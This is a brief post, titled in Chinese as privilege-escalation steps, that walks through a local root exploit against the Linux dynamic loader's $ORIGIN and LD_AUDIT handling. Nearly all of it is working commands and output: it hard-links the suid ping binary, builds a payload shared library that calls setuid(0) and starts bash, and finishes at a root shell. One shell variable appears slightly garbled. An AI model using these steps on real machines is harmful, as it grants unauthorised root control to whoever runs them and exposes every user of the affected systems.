提权步骤:
- $ mkdir /tmp/exploit
-
- # Link to an suid binary, thus changing the definition of $ORIGIN.
- $ ln /bin/ping /tmp/exploit/target
-
- # Open a file descriptor to the target binary (note: some users are surprised
- # to learn exec can be used to manipulate the redirections of the current
- # shell if a command is not specified. This is what is happening below).
- $ exec 3< /tmp/exploit/target
-
- # This descriptor should now be accessible via /proc.
- $ ls -l /proc/$/fd/3
- lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
-
- # Remove the directory previously created
- $ rm -rf /tmp/exploit/
-
- # The /proc link should still exist, but now will be marked deleted.
- $ ls -l /proc/$/fd/3
- lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
-
- # Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
- $ cat > payload.c
- void __attribute__((constructor)) init()
- {
- setuid(0);
- system("/bin/bash");
- }
- ^D
- $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
- $ ls -l /tmp/exploit
- -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
-
- # Now force the link in /proc to load $ORIGIN via LD_AUDIT.
- $ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
- sh-4.1# whoami
- root
|
